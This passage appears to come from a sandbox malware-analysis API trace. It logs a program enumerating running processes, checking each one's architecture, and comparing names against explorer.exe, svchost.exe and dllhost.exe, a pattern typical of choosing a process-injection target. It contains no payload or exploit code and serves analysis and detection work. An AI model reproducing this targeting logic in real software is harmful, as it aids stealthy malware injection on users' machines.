cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0213.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0213.782] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0213.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0213.783] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.783] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.783] CloseHandle (hObject=0xec) returned 1 [0213.783] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0213.783] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0213.783] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0213.783] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0213.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0213.784] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.784] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.784] CloseHandle (hObject=0xec) returned 1 [0213.784] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0213.784] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0213.784] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0213.784] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0213.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0213.784] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.784] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.784] CloseHandle (hObject=0xec) returned 1 [0213.784] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0213.784] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0213.784] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0213.784] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0213.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0213.785] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.785] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.785] CloseHandle (hObject=0xec) returned 1 [0213.785] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0213.785] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0213.785] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0213.785] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0213.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0213.786] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.786] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.786] CloseHandle (hObject=0xec) returned 1 [0213.786] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0213.786] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0213.786] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0213.786] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0213.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0213.786] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.786] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.786] CloseHandle (hObject=0xec) returned 1 [0213.786] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0213.786] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0213.786] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0213.787] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0213.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0213.787] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.787] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.787] CloseHandle (hObject=0xec) returned 1 [0213.787] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0213.787] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0213.787] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0213.787] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0213.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0213.788] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.788] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.788] CloseHandle (hObject=0xec) returned 1 [0213.788] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0213.788] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0213.788] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0213.788] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0213.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0213.788] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.788] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.788] CloseHandle (hObject=0xec) returned 1 [0213.789] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0213.789] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0213.789] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0213.789] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0213.789] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0213.789] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.789] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.789] CloseHandle (hObject=0xec) returned 1 [0213.789] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0213.789] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0213.789] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0213.789] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0213.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0213.790] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.790] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.790] CloseHandle (hObject=0xec) returned 1 [0213.790] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0213.790] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0213.790] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0213.790] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0213.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0213.791] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.791] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.791] CloseHandle (hObject=0xec) returned 1 [0213.791] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0213.791] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0213.791] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0213.791] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0213.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0213.791] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.791] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.791] CloseHandle (hObject=0xec) returned 1 [0213.791] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0213.791] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0213.791] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0213.791] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0213.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0213.792] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.792] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.792] CloseHandle (hObject=0xec) returned 1 [0213.792] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0213.792] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0213.792] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0213.792] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0213.793] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0213.793] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.793] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.793] CloseHandle (hObject=0xec) returned 1 [0213.793] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0213.793] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0213.793] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0213.793] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0213.793] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0213.793] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.793] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.793] CloseHandle (hObject=0xec) returned 1 [0213.793] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0213.794] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0213.794] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0213.794] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0213.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0213.794] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.794] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.794] CloseHandle (hObject=0xec) returned 1 [0213.794] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0213.794] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0213.794] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0213.794] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0213.795] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0213.795] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.795] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.795] CloseHandle (hObject=0xec) returned 1 [0213.795] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0213.795] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0213.795] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0213.795] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0213.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0213.898] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.899] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.899] CloseHandle (hObject=0xec) returned 1 [0213.899] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0213.899] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0213.899] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0213.899] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0213.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0213.899] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.899] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.899] CloseHandle (hObject=0xec) returned 1 [0213.899] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0213.899] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0213.899] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0213.899] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0213.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0213.900] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.900] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.900] CloseHandle (hObject=0xec) returned 1 [0213.900] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0213.900] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0213.900] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0213.900] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0213.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0213.901] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0213.901] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0213.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0213.902] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0213.902] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0213.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0213.903] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0213.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0213.903] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.903] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.903] CloseHandle (hObject=0xec) returned 1 [0213.903] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0213.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0213.904] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.904] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.904] CloseHandle (hObject=0xec) returned 1 [0213.904] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0213.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0213.905] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0213.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0213.905] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.905] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.905] CloseHandle (hObject=0xec) returned 1 [0213.905] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0213.905] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0213.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0213.906] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.906] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.906] CloseHandle (hObject=0xec) returned 1 [0213.906] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0213.906] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0213.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0213.907] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.907] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.907] CloseHandle (hObject=0xec) returned 1 [0213.907] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0213.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0213.907] IsWow64Process (in: 